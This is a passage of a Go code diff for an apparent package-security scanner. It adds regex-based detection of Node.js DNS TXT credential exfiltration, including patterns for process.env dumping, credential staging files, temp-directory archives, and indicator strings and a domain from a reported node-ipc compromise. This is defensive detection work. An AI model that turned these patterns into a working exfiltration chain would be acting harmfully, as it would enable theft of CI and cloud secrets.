+	`import\s+([A-Za-z_$][\w$]*)\s*,\s*(?:\*\s+as\s+[A-Za-z_$][\w$]*|\{[^}]+\})\s+from\s*['"](?:node:)?(?:fs|fs-extra|fs/promises)['"]`,
+)
+var fsDestructureRe = regexp.MustCompile(
+	`(?:(?:const|let|var)\s+|,\s*)\{\s*([^}]+)\s*\}\s*=\s*require\s*\(\s*['"](?:node:)?(?:fs|fs-extra|fs/promises)['"]\s*\)`,
+)
+var fsDestructureESMRe = regexp.MustCompile(
+	`import\s+(?:[A-Za-z_$][\w$]*\s*,\s*)?\{\s*([^}]+)\s*\}\s*from\s*['"](?:node:)?(?:fs|fs-extra|fs/promises)['"]`,
+)
+
+// collectModuleBindings walks the relevant alias/destructure
+// regexes and populates a moduleBindings struct. stringRanges
+// filter binding statements that live inside string literals so a
+// stringified example like `"require('os')"` does not register a
+// real binding. The optional combinedESMRe captures the default
+// identifier in combined imports such as `import os, { platform }
+// from 'os'`.
+func collectModuleBindings(content []byte, stringRanges [][2]int,
+	aliasRe, aliasESMRe, destructureRe, destructureESMRe, combinedESMRe *regexp.Regexp) moduleBindings {
+	b := newModuleBindings()
+	for _, mt := range aliasRe.FindAllSubmatchIndex(content, -1) {
+		if insideStringInterior(stringRanges, mt[0]) {
+			continue
+		}
+		b.aliases[string(content[mt[2]:mt[3]])] = true
+	}
+	for _, mt := range aliasESMRe.FindAllSubmatchIndex(content, -1) {
+		if insideStringInterior(stringRanges, mt[0]) {
+			continue
+		}
+		b.aliases[string(content[mt[2]:mt[3]])] = true
+	}
+	if combinedESMRe != nil {
+		for _, mt := range combinedESMRe.FindAllSubmatchIndex(content, -1) {
+			if insideStringInterior(stringRanges, mt[0]) {
+				continue
+			}
+			b.aliases[string(content[mt[2]:mt[3]])] = true
+		}
+	}
+	for _, mt := range destructureRe.FindAllSubmatchIndex(content, -1) {
+		if insideStringInterior(stringRanges, mt[0]) {
+			continue
+		}
+		body := string(content[mt[2]:mt[3]])
+		for _, raw := range strings.Split(body, ",") {
+			entry := strings.TrimSpace(raw)
+			if entry == "" {
+				continue
+			}
+			// In JS, only the LOCAL binding name (after `:` if a
+			// rename is present, otherwise the entry itself) is
+			// introduced into scope. Track the source member
+			// name separately so the partner check can verify
+			// that a renamed local (e.g. `t` from `{ tmpdir: t
+			// }`) originated from the expected method.
+			source := entry
+			local := entry
+			if idx := strings.Index(entry, ":"); idx >= 0 {
+				source = strings.TrimSpace(entry[:idx])
+				local = strings.TrimSpace(entry[idx+1:])
+			}
+			if local != "" {
+				b.names[local] = true
+				b.sourceByLocal[local] = source
+			}
+		}
+	}
+	for _, mt := range destructureESMRe.FindAllSubmatchIndex(content, -1) {
+		if insideStringInterior(stringRanges, mt[0]) {
+			continue
+		}
+		body := string(content[mt[2]:mt[3]])
+		for _, raw := range strings.Split(body, ",") {
+			entry := strings.TrimSpace(raw)
+			if entry == "" {
+				continue
+			}
+			// ESM `import { x as y } from 'm'` introduces `y`,
+			// not `x`. Track source member separately.
+			source := entry
+			local := entry
+			if idx := strings.Index(entry, " as "); idx >= 0 {
+				source = strings.TrimSpace(entry[:idx])
+				local = strings.TrimSpace(entry[idx+len(" as "):])
+			}
+			if local != "" {
+				b.names[local] = true
+				b.sourceByLocal[local] = source
+			}
+		}
+	}
+	return b
+}
+
+// inlineRequireOsTmpdirRe matches an inline-require os.tmpdir
+// invocation: `require('os').tmpdir(...)`. Submatch 1 captures the
+// `require` token so the caller filters on the token position, not
+// the boundary character.
+var inlineRequireOsTmpdirRe = regexp.MustCompile(
+	jsIdentBoundary + `(require)\s*\(\s*['"](?:node:)?os['"]\s*\)\s*\.\s*tmpdir\s*\(`,
+)
+
+// inlineRequireFsWriteRe matches inline-require fs write calls.
+// Submatch 1 captures the `require` token (for string-interior
+// filtering); submatch 2 captures the method name.
+var inlineRequireFsWriteRe = regexp.MustCompile(
+	jsIdentBoundary + `(require)\s*\(\s*['"](?:node:)?(?:fs|fs-extra|fs/promises)['"]\s*\)(?:\s*\.\s*promises)?\s*\.\s*(writeFile(?:Sync)?|appendFile(?:Sync)?|writeSync|outputFile(?:Sync)?)\s*\(`,
+)
+
+// wholeProcessEnvRe matches forms that exfiltrate VALUES from the
+// `process.env` object as a whole. Excludes name-only enumerations
+// (`Object.keys`, `for ... in process.env`) and the target-position
+// form `Object.assign(process.env, ...)` (which MUTATES process.env
+// rather than reading from it). The dynamic-bracket form is
+// matched here but post-filtered by the caller to exclude
+// assignment LHS like `process.env[k] = ...`.
+var wholeProcessEnvRe = regexp.MustCompile(
+	`JSON\.stringify\s*\([^)]*process\.env\b` +
+		`|Object\.(?:values|entries|fromEntries)\s*\([^)]*process\.env\b` +
+		`|Object\.assign\s*\([^)]*,\s*process\.env\b` +
+		`|process\.env\s*\[\s*[A-Za-z_$][\w$]*\s*\]`,
+)
+
+// processEnvBracketLHSAssignRe identifies the LHS-assignment shape
+// `process.env[<id>] = ...` (single `=`, not `==` / `===`).
+var processEnvBracketLHSAssignRe = regexp.MustCompile(
+	`process\.env\s*\[\s*[A-Za-z_$][\w$]*\s*\]\s*=[^=]`,
+)
+
+// processEnvDotLHSAssignRe identifies the LHS-assignment shape
+// `process.env.NAME = ...` (or the bracket-string equivalent
+// `process.env['NAME'] = ...`) where the assignment writes rather
+// than reads. The caller filters envReadRe matches that start at
+// the same position so setup/test code that initializes env vars
+// is not credited as a secret read.
+var processEnvDotLHSAssignRe = regexp.MustCompile(
+	`process\.env\s*\.\s*[A-Za-z_$][\w$]*\s*=[^=]` +
+		`|process\.env\s*\[\s*['"` + "`" + `][^'"` + "`" + `]+['"` + "`" + `]\s*\]\s*=[^=]`,
+)
+
+// nodeIPCIOCNeedles lists literal strings from the May 2026 node-ipc
+// compromise. Presence of any of these strings inside a real JS file
+// is high signal on its own; combined with a resolveTxt call it
+// confirms the chain.
+var nodeIPCIOCNeedles = []string{
+	"bt.node.js",
+	"sh.azurestaticprovider.net",
+	"__ntw",
+	"__ntRun",
+}
+
 // --- detection ---
 
-func detect(path string, m *metrics) []types.Finding {
+func detect(path string, m *metrics, content []byte) []types.Finding {
 	var out []types.Finding
 	if f := detectObfuscation(path, m); f != nil {
 		out = append(out, *f)
@@ -837,7 +1610,1238 @@ func detect(path string, m *metrics) []types.Finding {
 	if f := detectAgentPersistence(path, m); f != nil {
 		out = append(out, *f)
 	}
+	if f := detectDNSTXTExfil(path, m, content); f != nil {
+		out = append(out, *f)
+	}
 	return out
+}
+
+// jsStringInteriors returns sorted, non-overlapping byte ranges
+// (half-open: [start, end)) covering the INTERIOR of every JS string
+// literal in content. The quote characters themselves are NOT included
+// in the ranges so a literal `'dns'` exposes its `dns` bytes only at
+// offsets that fall inside the returned interval, and the outer
+// regexes that anchor on `require('dns')` still see the quoted token
+// in the raw content.
+//
+// Used together with comment masking to ignore stringified
+// documentation examples like `const doc = "uses dns.resolveTxt"`
+// when scanning for executable sink calls. The walker keeps comment
+// handling so a `//` or `/* */` inside a string literal is preserved
+// (the comment-masking pass below is the one that actually blanks
+// comment bytes; this helper only reports string ranges).
+func jsStringInteriors(content []byte) [][2]int {
+	var out [][2]int
+	const (
+		stCode = iota
+		stStringSingle
+		stStringDouble
+		stStringTemplate
+		stLineComment
+		stBlockComment
+		stRegex
+		stRegexCharClass
+	)
+	state := stCode
+	n := len(content)
+	startInterior := -1
+	var templateStack []int
+	for i := 0; i < n; i++ {
+		switch state {
+		case stCode:
+			if content[i] == '/' && i+1 < n {
+				switch content[i+1] {
+				case '/':
+					state = stLineComment
+					i++
+					continue
+				case '*':
+					state = stBlockComment
+					i++
+					continue
+				}
+				if couldBeRegexStart(content, i) {
+					state = stRegex
+					continue
+				}
+			}
+			if len(templateStack) > 0 {
+				// Inside a ${...} expression of an outer template
+				// literal. Track brace depth so the matching `}`
+				// transitions back to stStringTemplate.
+				switch content[i] {
+				case '{':
+					templateStack[len(templateStack)-1]++
+				case '}':
+					templateStack[len(templateStack)-1]--
+					if templateStack[len(templateStack)-1] == 0 {
+						templateStack = templateStack[:len(templateStack)-1]
+						state = stStringTemplate
+						startInterior = i + 1
+						continue
+					}
+				}
+			}
+			switch content[i] {
+			case '\'':
+				state = stStringSingle
+				startInterior = i + 1
+			case '"':
+				state = stStringDouble
+				startInterior = i + 1
+			case '`':
+				state = stStringTemplate
+				startInterior = i + 1
+			}
+		case stStringSingle:
+			if content[i] == '\\' && i+1 < n {
+				i++
+				continue
+			}
+			if content[i] == '\'' {
+				if startInterior >= 0 && i > startInterior {
+					out = append(out, [2]int{startInterior, i})
+				}
+				startInterior = -1
+				state = stCode
+			}
+		case stStringDouble:
+			if content[i] == '\\' && i+1 < n {
+				i++
+				continue
+			}
+			if content[i] == '"' {
+				if startInterior >= 0 && i > startInterior {
+					out = append(out, [2]int{startInterior, i})
+				}
+				startInterior = -1
+				state = stCode
+			}
+		case stStringTemplate:
+			if content[i] == '\\' && i+1 < n {
+				i++
+				continue
+			}
+			// `${...}` interpolation expressions inside a template
+			// literal execute as code at evaluation time. Close
+			// the current string-interior segment before the `${`
+			// and push a templateDepth entry so the walker can
+			// resume the template state when the matching closing
+			// `}` is found. The interior of `${...}` is walked
+			// with the full state machine (strings, comments,
+			// regex) so nested strings inside the expression are
+			// still recorded as string interiors.
+			if content[i] == '$' && i+1 < n && content[i+1] == '{' {
+				if startInterior >= 0 && i > startInterior {
+					out = append(out, [2]int{startInterior, i})
+				}
+				startInterior = -1
+				templateStack = append(templateStack, 1)
+				state = stCode
+				i++ // skip `{`
+				continue
+			}
+			if content[i] == '`' {
+				if startInterior >= 0 && i > startInterior {
+					out = append(out, [2]int{startInterior, i})
+				}
+				startInterior = -1
+				state = stCode
+			}
+		case stLineComment:
+			if content[i] == '\n' {
+				state = stCode
+			}
+		case stBlockComment:
+			if content[i] == '*' && i+1 < n && content[i+1] == '/' {
+				i++
+				state = stCode
+			}
+		case stRegex:
+			if content[i] == '\\' && i+1 < n {
+				i++
+				continue
+			}
+			if content[i] == '[' {
+				state = stRegexCharClass
+				continue
+			}
+			if content[i] == '/' {
+				state = stCode
+				for i+1 < n {
+					f := content[i+1]
+					if (f >= 'a' && f <= 'z') || (f >= 'A' && f <= 'Z') {
+						i++
+						continue
+					}
+					break
+				}
+			}
+		case stRegexCharClass:
+			if content[i] == '\\' && i+1 < n {
+				i++
+				continue
+			}
+			if content[i] == ']' {
+				state = stRegex
+			}
+		}
+	}
+	return out
+}
+
+// insideStringInterior returns true when idx falls inside one of the
+// sorted, non-overlapping string interior ranges. Used to filter
+// regex matches that originate from documentation strings rather
+// than executable code. Binary search keeps the partner-detection
+// loops linear in total (O(N log K) instead of O(N*K)) when a
+// minified JavaScript file contributes many candidate matches
+// alongside many string literals.
+func insideStringInterior(ranges [][2]int, idx int) bool {
+	lo, hi := 0, len(ranges)
+	for lo < hi {
+		mid := (lo + hi) / 2
+		r := ranges[mid]
+		if idx < r[0] {
+			hi = mid
+		} else if idx >= r[1] {
+			lo = mid + 1
+		} else {
+			return true
+		}
+	}
+	return false
+}
+
+// stripJSCommentsPreservingOffsets returns a copy of content with
+// `// ...` line comments and `/* ... */` block comments overwritten
+// by spaces. Newlines are kept so byte offsets and lineOf() results
+// match the original content exactly. This lets sink detection ignore
+// commented example invocations like `// dns.resolveTxt(...)` without
+// changing line numbers reported in findings.
+//
+// The walker tracks string state so that `//` and `/*` sequences
+// inside single-, double-, or backtick-quoted strings are preserved
+// untouched. The most common case this protects is URL literals like
+// `'https://attacker/'` on the same line as a real resolveTxt call:
+// blanking past the `//` would erase the rest of the line and hide
+// the sink. Template-bracket expressions (`${...}`) are not
+// recursively scanned; a resolveTxt call buried inside an
+// interpolated expression is rare and the conservative false-negative
+// is acceptable.
+func stripJSCommentsPreservingOffsets(content []byte) []byte {
+	out := make([]byte, len(content))
+	copy(out, content)
+	const (
+		stCode = iota
+		stStringSingle
+		stStringDouble
+		stStringTemplate
+		stLineComment
+		stBlockComment
+		stRegex
+		stRegexCharClass
+	)
+	state := stCode
+	n := len(out)
+	var templateStack []int
+	for i := 0; i < n; i++ {
+		switch state {
+		case stCode:
+			if out[i] == '/' && i+1 < n {
+				switch out[i+1] {
+				case '/':
+					state = stLineComment
+					out[i] = ' '
+					out[i+1] = ' '
+					i++
+					continue
+				case '*':
+					state = stBlockComment
+					out[i] = ' '
+					out[i+1] = ' '
+					i++
+					continue
+				}
+				if couldBeRegexStart(out, i) {
+					state = stRegex
+					out[i] = ' '
+					continue
+				}
+			}
+			if len(templateStack) > 0 {
+				switch out[i] {
+				case '{':
+					templateStack[len(templateStack)-1]++
+				case '}':
+					templateStack[len(templateStack)-1]--
+					if templateStack[len(templateStack)-1] == 0 {
+						templateStack = templateStack[:len(templateStack)-1]
+						state = stStringTemplate
+						continue
+					}
+				}
+			}
+			switch out[i] {
+			case '\'':
+				state = stStringSingle
+			case '"':
+				state = stStringDouble
+			case '`':
+				state = stStringTemplate
+			}
+		case stStringSingle:
+			if out[i] == '\\' && i+1 < n {
+				i++
+				continue
+			}
+			if out[i] == '\'' {
+				state = stCode
+			}
+		case stStringDouble:
+			if out[i] == '\\' && i+1 < n {
+				i++
+				continue
+			}
+			if out[i] == '"' {
+				state = stCode
+			}
+		case stStringTemplate:
+			if out[i] == '\\' && i+1 < n {
+				i++
+				continue
+			}
+			if out[i] == '$' && i+1 < n && out[i+1] == '{' {
+				templateStack = append(templateStack, 1)
+				state = stCode
+				i++ // skip `{`
+				continue
+			}
+			if out[i] == '`' {
+				state = stCode
+			}
+		case stLineComment:
+			if out[i] == '\n' {
+				state = stCode
+				continue
+			}
+			out[i] = ' '
+		case stBlockComment:
+			if out[i] == '*' && i+1 < n && out[i+1] == '/' {
+				out[i] = ' '
+				out[i+1] = ' '
+				i++
+				state = stCode
+				continue
+			}
+			if out[i] != '\n' {
+				out[i] = ' '
+			}
+		case stRegex:
+			if out[i] == '\\' && i+1 < n {
+				if out[i+1] != '\n' {
+					out[i+1] = ' '
+				}
+				out[i] = ' '
+				i++
+				continue
+			}
+			if out[i] == '[' {
+				state = stRegexCharClass
+				out[i] = ' '
+				continue
+			}
+			if out[i] == '/' {
+				state = stCode
+				out[i] = ' '
+				for i+1 < n {
+					f := out[i+1]
+					if (f >= 'a' && f <= 'z') || (f >= 'A' && f <= 'Z') {
+						out[i+1] = ' '
+						i++
+						continue
+					}
+					break
+				}
+				continue
+			}
+			if out[i] != '\n' {
+				out[i] = ' '
+			}
+		case stRegexCharClass:
+			if out[i] == '\\' && i+1 < n {
+				if out[i+1] != '\n' {
+					out[i+1] = ' '
+				}
+				out[i] = ' '
+				i++
+				continue
+			}
+			if out[i] == ']' {
+				state = stRegex
+				out[i] = ' '
+				continue
+			}
+			if out[i] != '\n' {
+				out[i] = ' '
+			}
+		}
+	}
+	return out
+}
+
+// findDNSTXTSink returns the 1-based line of the first real resolveTxt
+// call against the Node dns module, or 0 when no such call exists.
+// The function ties resolveTxt invocations to a discovered binding
+// (require / ESM import / new dns.Resolver()) so a bare string mention
+// of resolveTxt does not satisfy the signal. Comments are masked
+// before pattern matching so commented documentation examples never
+// register as sinks.
+func findDNSTXTSink(rawContent []byte) int {
+	content := stripJSCommentsPreservingOffsets(rawContent)
+	stringRanges := jsStringInteriors(rawContent)
+	_ = stringRanges // referenced below via insideStringInterior
+	// Inline-require chain: require('dns').resolveTxt(...)
+	for _, mt := range dnsInlineRequireResolveTxtRe.FindAllSubmatchIndex(content, -1) {
+		// The boundary byte at mt[0] can be a quote opening a
+		// string literal; the actual `require` token at mt[2]
+		// is the position we must verify is in executable code.
+		if insideStringInterior(stringRanges, mt[2]) {
+			continue
+		}
+		return lineOf(content, mt[2])
+	}
+
+	// Build the set of identifiers that are bound to the dns module or
+	// to a Resolver instance constructed from it. Every binding match
+	// is filtered through stringRanges so a stringified example like
+	// `const help = "require('dns')";` does not register a real
+	// alias.
+	aliases := map[string]bool{}
+	resolverCtorNames := map[string]bool{}
+	for _, mt := range dnsAliasAssignRe.FindAllSubmatchIndex(content, -1) {
+		if insideStringInterior(stringRanges, mt[0]) {
+			continue
+		}
+		aliases[string(content[mt[2]:mt[3]])] = true
+	}
+	for _, mt := range dnsAliasESMRe.FindAllSubmatchIndex(content, -1) {
+		if insideStringInterior(stringRanges, mt[0]) {
+			continue
+		}
+		aliases[string(content[mt[2]:mt[3]])] = true
+	}
+	// Combined ESM imports register the default identifier; the
+	// trailing namespace / destructure clause is picked up by the
+	// existing dnsAliasESMRe / dnsPromisesESMDestructureRe /
+	// dnsResolveTxtDestructureRe regexes which now accept an
+	// optional leading `<default>,` prefix.
+	for _, mt := range dnsAliasESMCombinedRe.FindAllSubmatchIndex(content, -1) {
+		if insideStringInterior(stringRanges, mt[0]) {
+			continue
+		}
+		aliases[string(content[mt[2]:mt[3]])] = true
+	}
+	// `<alias>.Resolver` constructors only count when <alias> is a
+	// confirmed dns binding; otherwise an unrelated SDK whose own
+	// constructor happens to be named `Resolver` would be misread
+	// as a Node DNS resolver and produce false positives.
+	for _, mt := range dnsResolverAliasReceiverRe.FindAllSubmatchIndex(content, -1) {
+		if insideStringInterior(stringRanges, mt[0]) {
+			continue
+		}
+		if aliases[string(content[mt[4]:mt[5]])] {
+			aliases[string(content[mt[2]:mt[3]])] = true
+		}
+	}
+	// `new (require('dns').Resolver)()` is unambiguous and registers
+	// without an alias-set check.
+	for _, mt := range dnsResolverInlineRequireRe.FindAllSubmatchIndex(content, -1) {
+		if insideStringInterior(stringRanges, mt[0]) {
+			continue
+		}
+		aliases[string(content[mt[2]:mt[3]])] = true
+	}
+	// Destructured `promises` namespace bindings count as dns
+	// receivers. Two regexes (CJS + ESM) capture the FULL brace body,
+	// and parseDestructuredPromisesAlias walks the body to find the
+	// effective local binding regardless of whether `promises` is the
+	// sole destructured member or sits alongside siblings such as
+	// `Resolver` or `lookup`. The same regexes also drive Resolver
+	// constructor extraction (parseDestructuredResolverAlias) so
+	// `const { Resolver } = require('dns'); const r = new Resolver()`
+	// can register `r` as a resolveTxt receiver through the
+	// new-instance assignment scan below.
+	for _, mt := range dnsPromisesCJSDestructureRe.FindAllSubmatchIndex(content, -1) {
+		if insideStringInterior(stringRanges, mt[0]) {
+			continue
+		}
+		body := string(content[mt[2]:mt[3]])
+		if local, ok := parseDestructuredPromisesAlias(body, false); ok {
+			aliases[local] = true
+		}
+		if local, ok := parseDestructuredResolverAlias(body, false); ok {
+			resolverCtorNames[local] = true
+		}
+	}
+	for _, mt := range dnsPromisesESMDestructureRe.FindAllSubmatchIndex(content, -1) {
+		if insideStringInterior(stringRanges, mt[0]) {
+			continue
+		}
+		body := string(content[mt[2]:mt[3]])
+		if local, ok := parseDestructuredPromisesAlias(body, true); ok {
+			aliases[local] = true
+		}
+		if local, ok := parseDestructuredResolverAlias(body, true); ok {
+			resolverCtorNames[local] = true
+		}
+	}
+
+	// For every Resolver constructor name destructured from the dns
+	// module, register `new <ctor>()` instance bindings as receivers
+	// so `r.resolveTxt(...)` later in the file fires the sink.
+	if len(resolverCtorNames) > 0 {
+		for _, mt := range newInstanceAssignRe.FindAllSubmatchIndex(content, -1) {
+			if insideStringInterior(stringRanges, mt[0]) {
+				continue
+			}
+			if resolverCtorNames[string(content[mt[4]:mt[5]])] {
+				aliases[string(content[mt[2]:mt[3]])] = true
+			}
+		}
+	}
+
+	if len(aliases) > 0 {
+		for _, mt := range identifierResolveTxtCallRe.FindAllSubmatchIndex(content, -1) {
+			if !aliases[string(content[mt[2]:mt[3]])] {
+				continue
+			}
+			if insideStringInterior(stringRanges, mt[2]) {
+				continue
+			}
+			return lineOf(content, mt[2])
+		}
+	}
+
+	// Destructured resolveTxt imports: collect the effective local
+	// binding (alias if `:` is present, otherwise the source name)
+	// when the source name is `resolveTxt`. Then look for bare calls
+	// to that binding.
+	bareNames := map[string]bool{}
+	// Also pick up destructures whose RHS is a previously-bound
+	// dns alias (e.g. `const { resolveTxt } = dns.promises`).
+	for _, mt := range dnsResolveTxtFromAliasRe.FindAllSubmatchIndex(content, -1) {
+		if insideStringInterior(stringRanges, mt[0]) {
+			continue
+		}
+		if !aliases[string(content[mt[4]:mt[5]])] {
+			continue
+		}
+		body := string(content[mt[2]:mt[3]])
+		for _, raw := range strings.Split(body, ",") {
+			entry := strings.TrimSpace(raw)
+			source := entry
+			local := entry
+			if idx := strings.Index(entry, ":"); idx >= 0 {
+				source = strings.TrimSpace(entry[:idx])
+				local = strings.TrimSpace(entry[idx+1:])
+			}
+			if source == "resolveTxt" && local != "" {
+				bareNames[local] = true
+			}
+		}
+	}
+	for _, mt := range dnsResolveTxtDestructureRe.FindAllSubmatchIndex(content, -1) {
+		if insideStringInterior(stringRanges, mt[0]) {
+			continue
+		}
+		// Two alternation slots; only one is populated per match.
+		var body string
+		if mt[2] >= 0 {
+			body = string(content[mt[2]:mt[3]])
+		} else if mt[4] >= 0 {
+			body = string(content[mt[4]:mt[5]])
+		}
+		if body == "" {
+			continue
+		}
+		for _, raw := range strings.Split(body, ",") {
+			entry := strings.TrimSpace(raw)
+			source := entry
+			local := entry
+			if idx := strings.Index(entry, ":"); idx >= 0 {
+				source = strings.TrimSpace(entry[:idx])
+				local = strings.TrimSpace(entry[idx+1:])
+			}
+			// ESM `as` aliasing: `resolveTxt as lookup`.
+			if idx := strings.Index(local, " as "); idx >= 0 {
+				source = strings.TrimSpace(local[:idx])
+				local = strings.TrimSpace(local[idx+len(" as "):])
+			}
+			if source == "resolveTxt" && local != "" {
+				bareNames[local] = true
+			}
+		}
+	}
+
+	if len(bareNames) > 0 {
+		for _, mt := range bareResolveTxtCallRe.FindAllSubmatchIndex(content, -1) {
+			if !bareNames[string(content[mt[2]:mt[3]])] {
+				continue
+			}
+			if insideStringInterior(stringRanges, mt[2]) {
+				continue
+			}
+			// Method-definition shapes (`resolveTxt(args) { ... }`,
+			// `function resolveTxt(args) { ... }`, class method
+			// declarations, async method bodies) are not invocations.
+			// Skip the match when the closing `)` is followed by a
+			// `{` (function body opener), or when the call is
+			// preceded by `function` / `async function`.
+			if isFunctionDefinition(content, mt[1]) || isFunctionKeywordBefore(content, mt[2]) {
+				continue
+			}
+			return lineOf(content, mt[2])
+		}
+	}
+
+	return 0
+}
+
+// firstArgEnd returns the byte offset one past the end of the FIRST
+// argument of a call whose opening `(` sits at openParen. The
+// returned position is either the byte of the first `,` at the
+// call's argument depth, or the matching `)` (when the call has a
+// single argument), or -1 when the call is unbalanced. String
+// interiors are skipped so a `,` or `)` quoted inside an argument
+// does not falsely terminate the arg list.
+func firstArgEnd(content []byte, openParen int, stringRanges [][2]int) int {
+	if openParen < 0 || openParen >= len(content) || content[openParen] != '(' {
+		return -1
+	}
+	depth := 1
+	for i := openParen + 1; i < len(content); i++ {
+		if insideStringInterior(stringRanges, i) {
+			continue
+		}
+		switch content[i] {
+		case '(', '[', '{':
+			depth++
+		case ')', ']', '}':
+			depth--
+			if depth == 0 {
+				return i
+			}
+		case ',':
+			if depth == 1 {
+				return i
+			}
+		}
+	}
+	return -1
+}
+
+// enclosingOpenParen returns the byte offset of the most recently
+// unclosed `(` at position idx, or -1 when idx is at the top level
+// (no enclosing function call / parenthesized expression). String
+// interiors are skipped so a `(` quoted inside a string does not
+// shift the scope. The walk is O(idx); callers should cache when
+// inspecting many positions in the same file.
+func enclosingOpenParen(content []byte, idx int, stringRanges [][2]int) int {
+	var stack []int
+	for i := 0; i < idx && i < len(content); i++ {
+		if insideStringInterior(stringRanges, i) {
+			continue
+		}
+		switch content[i] {
+		case '(':
+			stack = append(stack, i)
+		case ')':
+			if len(stack) > 0 {
+				stack = stack[:len(stack)-1]
+			}
+		}
+	}
+	if len(stack) == 0 {
+		return -1
+	}
+	return stack[len(stack)-1]
+}
+
+// sameStatement returns true when positions a and b lie within
+// maxBytes of each other AND belong to the same call-scope AND no
+// statement boundary sits between them. Boundaries:
+//
+//   - a `;` in executable code,
+//   - a `,` in executable code when both positions share the SAME
+//     enclosing `(` (or are both at the top level): a top-level
+//     `, help=...` sequence expression separates partners, whereas
+//     a `,` INSIDE the same function call's argument list does not
+//     (`path.join(os.tmpdir(), 'stage.tar.gz')` keeps both args
+//     in the same scope), and
+//   - a newline `\n` whose preceding line does NOT end with a
+//     continuation character.
+//
+// The caller supplies a sorted, non-overlapping list of string-
+// interior ranges so quoted characters do not contribute
+// boundaries.
+func sameStatement(content []byte, a, b, maxBytes int, stringRanges [][2]int) bool {
+	if a > b {
+		a, b = b, a
+	}
+	if b-a > maxBytes {
+		return false
+	}
+	// When the anchor sits inside a call (e.g. `path.join(...)`),
+	// a `,` at the anchor's depth is the call's arg separator and
+	// the args are typically COMBINED into one value by the call;
+	// the partner check accepts them as related. When the anchor
+	// sits at the TOP level, a `,` at the anchor's depth is a
+	// sequence-expression separator — a hard split. The token is
+	// allowed to live at a deeper depth than the anchor (for
+	// example the envs.txt filename token sitting INSIDE the
+	// write call's argument list while the anchor identifier is
+	// at the top level outside the parens).
+	commaAtAnchorLevelIsSeparator := enclosingOpenParen(content, a, stringRanges) < 0
+	parenDepth := 0
+	exitedAnchorScope := false
+	for i := a + 1; i < b; i++ {
+		c := content[i]
+		if insideStringInterior(stringRanges, i) {
+			continue
+		}
+		if c == '(' || c == '[' || c == '{' {
+			parenDepth++
+			continue
+		}
+		if c == ')' || c == ']' || c == '}' {
+			parenDepth--
+			if parenDepth < 0 {
+				// Walked past the anchor's enclosing
+				// `(` / `[` / `{`. From this point on the
+				// walk is at a SHALLOWER scope than the
+				// anchor, so a `,` at depth 0 is a top-
+				// level sequence separator regardless of
+				// the original anchor scope.
+				exitedAnchorScope = true
+				parenDepth = 0
+			}
+			continue
+		}
+		if c == ',' && parenDepth == 0 {
+			if commaAtAnchorLevelIsSeparator || exitedAnchorScope {
+				return false
+			}
+		}
+		if c == ';' {
+			return false
+		}
+		if c != '\n' {
+			continue
+		}
+		// Skip newlines inside string interiors (template literals).
+		if insideStringInterior(stringRanges, i) {
+			continue
+		}
+		// Newline-as-boundary heuristic: walk back from \n to find
+		// the last non-whitespace char on the previous line (if
+		// it's a continuation operator, the statement continues),
+		// AND walk forward to find the first non-whitespace char
+		// of the next line (if it's a leading operator like `+`
+		// `.` `?`, the statement also continues). Either check
+		// passing is enough to treat the newline as continuation.
+		lastCodeChar := byte(0)
+		for k := i - 1; k > a; k-- {
+			kc := content[k]
+			if kc == '\n' {
+				break
+			}
+			if kc == ' ' || kc == '\t' || kc == '\r' {
+				continue
+			}
+			if insideStringInterior(stringRanges, k) {
+				continue
+			}
+			lastCodeChar = kc
+			break
+		}
+		isTrailingCont := false
+		switch lastCodeChar {
+		case ',', '(', '[', '{', '+', '-', '*', '/', '?', ':',
+			'=', '<', '>', '&', '|', '!', '.':
+			isTrailingCont = true
+		}
+		nextCodeChar := byte(0)
+		for k := i + 1; k < b; k++ {
+			kc := content[k]
+			if kc == ' ' || kc == '\t' || kc == '\r' || kc == '\n' {
+				continue
+			}
+			if insideStringInterior(stringRanges, k) {
+				continue
+			}
+			nextCodeChar = kc
+			break
+		}
+		isLeadingCont := false
+		switch nextCodeChar {
+		case '+', '-', '*', '/', '?', ':', '=', '<', '>',
+			'&', '|', '!', '.', ',', ')', ']', '}':
+			isLeadingCont = true
+		}
+		if isTrailingCont || isLeadingCont {
+			continue
+		}
+		// Blank intervening line OR identifier on next line
+		// without a continuation operator: treat as a boundary.
+		if lastCodeChar == 0 && nextCodeChar == 0 {
+			continue
+		}
+		return false
+	}
+	return true
+}
+
+// isFunctionDefinition returns true when the byte immediately after
+// the call's argument list (after the matching `)`) is `{` AND no
+// newline separates the `)` from the `{`. A `{` on a NEW line is a
+// separate block statement, not a function body, so a bare
+// `resolveTxt(...)` call followed by `{ audit(); }` on the next line
+// must still register as a call. argsStart is one past the opening
+// paren.
+func isFunctionDefinition(content []byte, argsStart int) bool {
+	depth := 1
+	i := argsStart
+	n := len(content)
+	for i < n && depth > 0 {
+		switch content[i] {
+		case '(':
+			depth++
+		case ')':
+			depth--
+		case '"', '\'', '`':
+			quote := content[i]
+			i++
+			for i < n && content[i] != quote {
+				if content[i] == '\\' && i+1 < n {
+					i += 2
+					continue
+				}
+				i++
+			}
+		}
+		i++
+	}
+	for i < n {
+		c := content[i]
+		if c == ' ' || c == '\t' {
+			i++
+			continue
+		}
+		if c == '\n' || c == '\r' {
+			// Newline separates the call from any following
+			// block; not a function definition.
+			return false
+		}
+		return c == '{'
+	}
+	return false
+}
+
+// isFunctionKeywordBefore returns true when `function` (optionally
+// preceded by `async`) appears immediately before the identifier at
+// nameStart. Catches `function resolveTxt(` declarations.
+func isFunctionKeywordBefore(content []byte, nameStart int) bool {
+	if nameStart <= 0 {
+		return false
+	}
+	i := nameStart - 1
+	for i >= 0 {
+		c := content[i]
+		if c == ' ' || c == '\t' || c == '\n' || c == '\r' {
+			i--
+			continue
+		}
+		break
+	}
+	if i < 0 {
+		return false
+	}
+	end := i + 1
+	for i >= 0 {
+		c := content[i]
+		if c == '_' || (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') || (c >= '0' && c <= '9') {
+			i--
+			continue
+		}
+		break
+	}
+	word := string(content[i+1 : end])
+	return word == "function"
+}
+
+// detectDNSTXTExfil flags resolveTxt-based credential exfiltration. A
+// bare resolveTxt call by itself is permitted: many legitimate
+// libraries (DMARC checkers, SPF tools, monitoring) use DNS TXT
+// lookups. The rule fires only when the call is accompanied by at
+// least one further risk signal:
+//   - CI/cloud secret read (process.env or known cred path),
+//   - on-disk credential staging file (envs.txt),
+//   - archive packaging into a temp directory (tar.gz + os.tmpdir),
+//   - install-time daemonization, or
+//   - a known node-ipc compromise IOC string (bt.node.js, __ntw, etc.).
+//
+// Severity is HIGH for a single partner signal; presence of a known
